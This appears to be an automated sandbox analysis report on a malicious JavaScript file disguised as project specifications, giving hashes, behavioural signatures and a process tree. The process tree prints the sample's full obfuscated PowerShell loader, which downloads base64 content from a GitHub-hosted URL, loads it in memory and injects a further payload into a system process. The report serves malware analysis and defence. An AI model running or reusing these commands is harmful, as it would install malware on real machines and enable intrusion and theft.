Analysis
-
max time kernel
122s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30-09-2024 00:51
Static task
static1
Behavioral task
behavioral1
Sample
PROJECT DETAILS AND SPECIFICATIONS.js
Resource
win7-20240903-en
General
-
Target
PROJECT DETAILS AND SPECIFICATIONS.js
-
Size
197KB
-
MD5
ef818b0f3b065744f9ca0e7e6463fa5a
-
SHA1
042ab0111d9be103d7558da8d5aacb86f7c91d22
-
SHA256
f599b75aff511ee47cf3e7ea69ff58ef8025f15340add9b7c01bc7baaaaf9503
-
SHA512
6d48fcd76d1db0fdb208c324139cdcca6e154508cfb783cd09dd51766f20177877ddeb1782180ac14631b5a7a373b1aa85ff512665369118178edb7a19c6f735
-
SSDEEP
6144:gzMNJy9Ha4Lp17+n4O9/8bTwNN4mEqtm4I3W4J:JNo93Lp17U4O9/8bTw/43qtm4eW4J
Malware Config
Extracted
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txt
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2140 powershell.exe 6 2140 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1828 powershell.exe 2140 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 4 raw.githubusercontent.com 5 raw.githubusercontent.com 6 raw.githubusercontent.com -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1828 powershell.exe 2140 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1828 powershell.exe Token: SeDebugPrivilege 2140 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2540 wrote to memory of 1828 2540 wscript.exe 30 PID 2540 wrote to memory of 1828 2540 wscript.exe 30 PID 2540 wrote to memory of 1828 2540 wscript.exe 30 PID 1828 wrote to memory of 2140 1828 powershell.exe 32 PID 1828 wrote to memory of 2140 1828 powershell.exe 32 PID 1828 wrote to memory of 2140 1828 powershell.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\PROJECT DETAILS AND SPECIFICATIONS.js"1⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAWAAnACsAJwBuAHQAdQByAGwAIAA9ACcAKwAnACAAJwArACcAMwAnACsAJwA5AG0AJwArACcAaAB0AHQAcABzADoALwAvAHIAJwArACcAYQB3ACcAKwAnAC4AJwArACcAZwBpAHQAaAB1AGIAJwArACcAdQBzACcAKwAnAGUAcgAnACsAJwBjAG8AbgB0ACcAKwAnAGUAbgB0AC4AYwBvAG0AJwArACcALwAnACsAJwBOACcAKwAnAG8ARABlAHQAZQBjACcAKwAnAHQAJwArACcATwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAJwArACcAYwB0AE8AbgAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtACcAKwAnAGEAaQBuAC8AJwArACcARABlAHQAJwArACcAYQBoAE4AJwArACcAbwB0ACcAKwAnAGUAXwBKAC4AdAB4ACcAKwAnAHQAJwArACcAMwA5AG0AOwAgACcAKwAnAFgAbgB0AGIAJwArACcAYQBzAGUANgA0AEMAbwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAnACsAJwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdAAnACsAJwBlAG0ALgBOAGUAJwArACcAdAAuACcAKwAnAFcAZQAnACsAJwBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgAnACsAJwBEAG8AdwAnACsAJwBuACcAKwAnAGwAbwBhAGQAUwAnACsAJwB0AHIAaQAnACsAJwBuAGcAJwArACcAKABYACcAKwAnAG4AdAB1AHIAJwArACcAbAApADsAIABYAG4AdAAnACsAJwBiAGkAbgBhAHIAeQAnACsAJwBDAG8AbgB0AGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdABlAG0AJwArACcALgBDAG8AbgAnACsAJwB2AGUAcgB0AF0AOgA6AEYAcgBvACcAKwAnAG0AQgBhAHMAJwArACcAZQA2ADQAUwB0AHIAaQBuAGcAJwArACcAKABYAG4AdAAnACsAJwBiAGEAJwArACcAcwAnACsAJwBlADYANAAnACsAJwBDAG8AJwArACcAbgAnACsAJwB0AGUAbgB0ACkAOwAgAFgAJwArACcAbgAnACsAJwB0ACcAKwAnAGEAcwAnACsAJwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbACcAKwAnAFIAZQBmACcAKwAnAGwAZQAnACsAJwBjAHQAJwArACcAaQAnACsAJwBvACcAKwAnAG4AJwArACcALgAnACsAJwBBAHMAcwBlAG0AYgBsAHkAXQA6ACcAKwAnADoATABvAGEAJwArACcAZAAnACsAJwAoACcAKwAnAFgAbgAnACsAJwB0AGIAJwArACcAaQAnACsAJwBuAGEAJwArACcAcgB5ACcAKwAnAEMAbwBuAHQAZQBuAHQAKQA7ACAAWwAnACsAJwBkACcAKwAnAG4AbABpAGIAJwArACcALgBJAE8ALgAnACsAJwBIAG8AbQBlAF0AOgA6AFYAJwArACcAQQBJACcAKwAnACgAYQAnACsAJwBuADEAdAB4AHQAJwArACcALgAnACsAJwBzAGEAYgBiAGEALwB2ACcAKwAnAGUAZAAuADIAcgAuADMAOQBiADMANAA1ADMAMAAyAGEAMAA3ACcAKwAnADUAYgAxAGIAYwAwAGQANAA1AGIANgAzADIAJwArACcAZQAnACsAJwBiADkAJwArACcAZQBlADYAMgAtAGIAdQBwAC8ALwA6AHMAJwArACcAcAB0AHQAJwArACcAaABhAG4AJwArACcAMQAsACAAJwArACcAYQAnACsAJwBuADEAZABlAHMAYQB0AGkAdgAnACsAJwBhAGQAbwAnACsAJwBhAG4AMQAsACcAKwAnACAAYQBuADEAZAAnACsAJwBlACcAKwAnAHMAYQAnACsAJwB0AGkAdgBhAGQAbwAnACsAJwBhAG4AJwArACcAMQAsACAAYQBuACcAKwAnADEAZABlAHMAYQB0AGkAdgBhAGQAbwBhAG4AMQAsACAAYQBuADEAQQBkAGQASQAnACsAJwBuAFAAcgBvAGMAZQBzACcAKwAnAHMAMwAyAGEAbgAxACwAIAAnACsAJwBhACcAKwAnAG4AMQBkAGUAcwBhACcAKwAnAHQAaQAnACsAJwB2ACcAKwAnAGEAZAAnACsAJwBvAGEAbgAnACsAJwAxACwAYQBuADEAYQBuADEAKQAnACkAIAAgAC0AYwByAGUAcABsAGEAQwBFACcAYQBuADEAJwAsAFsAYwBoAGEAUgBdADMANAAgAC0AUgBFAHAATABBAEMAZQAoAFsAYwBoAGEAUgBdADUAMQArAFsAYwBoAGEAUgBdADUANwArAFsAYwBoAGEAUgBdADEAMAA5ACkALABbAGMAaABhAFIAXQAzADkALQBjAHIAZQBwAGwAYQBDAEUAIAAgACcAWABuAHQAJwAsAFsAYwBoAGEAUgBdADMANgApAHwASQBuAFYAbwBLAEUALQBlAHgAcABSAEUAcwBTAEkAbwBOAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('X'+'nturl ='+' '+'3'+'9m'+'https://r'+'aw'+'.'+'github'+'us'+'er'+'cont'+'ent.com'+'/'+'N'+'oDetec'+'t'+'On/NoDe'+'te'+'ctOn/refs/heads/m'+'ain/'+'Det'+'ahN'+'ot'+'e_J.tx'+'t'+'39m; '+'Xntb'+'ase64Content = (New'+'-Object Syst'+'em.Ne'+'t.'+'We'+'bC'+'li'+'ent).'+'Dow'+'n'+'loadS'+'tri'+'ng'+'(X'+'ntur'+'l); Xnt'+'binary'+'Content ='+' [System'+'.Con'+'vert]::Fro'+'mBas'+'e64String'+'(Xnt'+'ba'+'s'+'e64'+'Co'+'n'+'tent); X'+'n'+'t'+'as'+'sembly '+'= ['+'Ref'+'le'+'ct'+'i'+'o'+'n'+'.'+'Assembly]:'+':Loa'+'d'+'('+'Xn'+'tb'+'i'+'na'+'ry'+'Content); ['+'d'+'nlib'+'.IO.'+'Home]::V'+'AI'+'(a'+'n1txt'+'.'+'sabba/v'+'ed.2r.39b345302a07'+'5b1bc0d45b632'+'e'+'b9'+'ee62-bup//:s'+'ptt'+'han'+'1, '+'a'+'n1desativ'+'ado'+'an1,'+' an1d'+'e'+'sa'+'tivado'+'an'+'1, an'+'1desativadoan1, an1AddI'+'nProces'+'s32an1, '+'a'+'n1desa'+'ti'+'v'+'ad'+'oan'+'1,an1an1)') -creplaCE'an1',[chaR]34 -REpLACe([chaR]51+[chaR]57+[chaR]109),[chaR]39-creplaCE 'Xnt',[chaR]36)|InVoKE-expREsSIoN"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a0aac99c9afffff60d2fd89eae076435
SHA1252b0495b521d8f90ee07229246d85abca5f328e
SHA256577891673b19f5f6ebfc6022dc41e9afce55a247794ec19a8b9056e22531e6ca
SHA5129e11a2e9269aff8e4c3a1df23c534862041200c75fa830173948bd49758db2f79afde9ee9db1463e1228cd9a8444aa278d5381ebfd147eec3a63998e3694b18d